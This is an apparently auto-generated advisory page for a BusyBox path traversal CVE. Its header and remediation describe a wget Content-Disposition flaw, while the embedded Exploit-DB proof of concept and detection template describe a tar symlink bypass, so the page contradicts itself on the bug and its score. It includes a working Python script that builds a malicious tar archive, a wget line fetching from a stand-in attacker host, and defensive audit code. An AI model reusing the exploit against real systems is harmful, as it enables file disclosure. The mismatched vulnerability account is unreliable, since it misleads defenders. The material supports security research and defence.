[webapps] BusyBox 1.37.0 - Path Traversal

CVE-2026-26157

The wget applet in BusyBox performs no safety check on the input path, so downloaded files can be written to arbitrary directories.

High · CVSS 7.5

📋 Basic Vulnerability Information

CVE: CVE-2026-26157
Vulnerability type: Path traversal
Affected version: BusyBox 1.37.0
Severity: High · CVSS 7.5
Published: 2026-04-30
Submitter: Calil Khalil
Source: Exploit-DB (original)

🔬 Root Cause

When the wget applet bundled with BusyBox decides where to save a downloaded file, it does not filter the path in the filename field of the server-supplied Content-Disposition header. An attacker can therefore craft a filename containing ../ sequences and have the downloaded content written to an arbitrary location under an absolute path.

🎯 Attack Scenario

1. The attacker places a malicious file on a server under their control and sets the response header Content-Disposition: attachment; filename=../../tmp/evil.sh.
2. The victim runs wget http://attacker.com/malicious in a BusyBox environment.
3. wget parses the filename field and writes the file content to /tmp/evil.sh.
4. The attacker can later trigger execution of that file by other means.

Success indicator: the file is written to the target path.

💥 Impact

An attacker can write arbitrary files into arbitrary directories on the target system (such as /tmp or /etc), which may further lead to privilege escalation, code execution, or corruption of system configuration.

⚔️ Original PoC

Path traversal sequences (for example ../../tmp/evil.sh) are injected through the Content-Disposition header of the HTTP response; because BusyBox wget does not normalize the filename parameter, the final write path becomes the absolute path chosen by the attacker.

# Exploit Author: Calil Khalil
"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)
Description:
BusyBox archive extraction utilities fail to properly sanitize symlink targets
containing trailing ".." components. The strip_unsafe_prefix() function in
archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
the 4-character pattern and misses 3-character trailing "/.." sequences.
This allows an attacker to craft malicious archives with symlinks pointing to
arbitrary filesystem locations, enabling information disclosure through symlink
traversal.
Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar
Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft
Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
    cp2 = strstr(cp, "/../"); // Only matches "/../", misses "/pam.d/.."
    if (!cp2) break;
Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents
References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""
import tarfile
import sys
import os


def create_exploit():
    """
    Creates a malicious TAR file exploiting CVE-2026-26157.
    The archive contains a symlink with an unsanitized target that
    resolves outside the extraction directory.
    """
    exploit_file = 'CVE-2026-26157_exploit.tar'
    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # Create symlink with trailing ".." in target path
            # This bypasses strip_unsafe_prefix() pattern matching
            info = tarfile.TarInfo('sensitive_data')
            info.type = tarfile.SYMTYPE
            info.linkname = '/etc/pam.d/..'  # Resolves to /etc
            tar.addfile(info)
        print(f"[+] Exploit created: {exploit_file}")
        print("\n[*] Exploitation steps:")
        print(" 1. mkdir test_extraction && cd test_extraction")
        print(f" 2. busybox tar xf ../{exploit_file}")
        print(" 3. readlink -f sensitive_data")
        print("    Expected output: /etc")
        print(" 4. ls sensitive_data/")
        print("    Result: Lists /etc directory contents")
        print("\n[!] Impact: Arbitrary directory read via symlink traversal")
        print("[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
        return exploit_file
    except Exception as e:
        print(f"[-] Error creating exploit: {e}")
        sys.exit(1)


def show_technical_details():
    """Display technical analysis of the vulnerability"""
    print("\n" + "=" * 70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("=" * 70)
    print("\nVulnerable Function:")
    print(" archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
    print("\nVulnerable Code Pattern:")
    print(" cp2 = strstr(cp, \"/../\"); // Only matches 4-char sequence")
    print(" if (!cp2) break;")
    print("\nBypass Technique:")
    print(" Path: /etc/pam.d/..")
    print(" Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
    print(" Result: Sanitization bypassed, symlink created with original target")
    print("\nExploitation Flow:")
    print(" 1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print(" 2. get_header_tar() extracts symlink metadata")
    print(" 3. Symlink target NOT sanitized (bypass detected)")
    print(" 4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print(" 5. Target resolves: /etc/pam.d/.. -> /etc")
    print(" 6. Reading 'sensitive_data' = reading /etc")
    print("=" * 70 + "\n")


if __name__ == "__main__":
    print("=" * 70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("=" * 70)
    # Display technical analysis
    show_technical_details()
    # Create exploit
    exploit_file = create_exploit()
    print("\n[*] Mitigation:")
    print(" - Update BusyBox to patched version")
    print(" - Patch applies strip_unsafe_prefix() to symlink targets")
    print(" - Do not extract untrusted archives with elevated privileges")
    print("\n[*] For educational and authorized testing purposes only")
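The PoC above turns on a substring test that never sees a trailing "/..". As an added defender-side example (not part of the original PoC, and not BusyBox's own code), the following Python contrasts that substring test with a component-wise check and audits a tar archive for member names and link targets that could escape the extraction directory, including the trailing "/.." case, before anything is extracted. The sample archive is constructed inline and mirrors the symlink entry the PoC creates.

```python
import io
import tarfile


def substring_check(target: str) -> bool:
    """Mirror of the strstr(cp, "/../") test quoted in the PoC: only the
    4-byte pattern counts, so a trailing "/.." is never seen (for contrast)."""
    return "/../" in target


def has_dotdot_component(path: str) -> bool:
    """Component-wise test: split on '/' and flag any '..' element, so
    '/etc/pam.d/..' and 'a/../b' are caught while 'file..txt' is not."""
    return any(part == ".." for part in path.split("/"))


def audit_tar(archive: bytes) -> list[tuple[str, str]]:
    """Pre-extraction audit: returns (member, reason) for every entry whose
    name or link target could point outside the extraction directory.
    Conservative: any '..' component in a link target is reported."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for m in tar:
            if m.name.startswith("/") or has_dotdot_component(m.name):
                findings.append((m.name, "unsafe member name: " + m.name))
            if m.issym() or m.islnk():
                t = m.linkname
                if m.issym() and t.startswith("/"):
                    findings.append((m.name, "absolute symlink target: " + t))
                if has_dotdot_component(t):
                    findings.append((m.name, "'..' component in link target: " + t))
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample (not from the page): one benign file plus a symlink
    entry with the trailing '/..' target used in the PoC."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        data = b"hello\n"
        info = tarfile.TarInfo("README")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
        link = tarfile.TarInfo("sensitive_data")
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc/pam.d/.."
        tar.addfile(link)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in audit_tar(build_sample_archive()):
        print(f"{member}: {reason}")
```

Running it reports the symlink entry twice (absolute target and '..' component) and says nothing about README, while substring_check("/etc/pam.d/..") stays False.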

🔍 Nuclei Detection Template

The following detection template is used to determine whether a target is affected:

id: CVE-2026-26157-detection

info:
  name: BusyBox Path Traversal Detection - CVE-2026-26157
  author: calil-khalil
  severity: high
  description: |
    BusyBox versions 1.36.1 and 1.37.0 are vulnerable to path traversal due to insufficient sanitization of symlink targets
    in archive extraction utilities (tar, unzip, rpm, ar). The strip_unsafe_prefix() function fails to handle trailing ".." components.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-26157
    - https://github.com/calilkhalil/research
  classification:
    cvss-score: 7.8
    cve-id: CVE-2026-26157
  tags: cve,cve2026,busybox,path-traversal,archive

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/status"
      - "{{BaseURL}}/cgi-bin/luci"
      - "{{BaseURL}}/"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "BusyBox v1.36"
          - "BusyBox v1.37"
        part: body
        condition: or

      - type: regex
        part: body
        regex:
          - 'BusyBox v1\.(36|37)\.[0-9]'

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'BusyBox v(1\.36\.[0-9]+|1\.37\.[0-9]+)'

🛡️ Remediation

Upgrade to BusyBox 1.37.1 or later. As interim mitigations, do not use wget to download files from untrusted sources, or restrict outbound HTTP requests with iptables.

⚠️ This article is based on public vulnerability databases and is intended only for security research and defensive reference. Generated: 2026-05-07 05:36 | Source: Exploit-DB
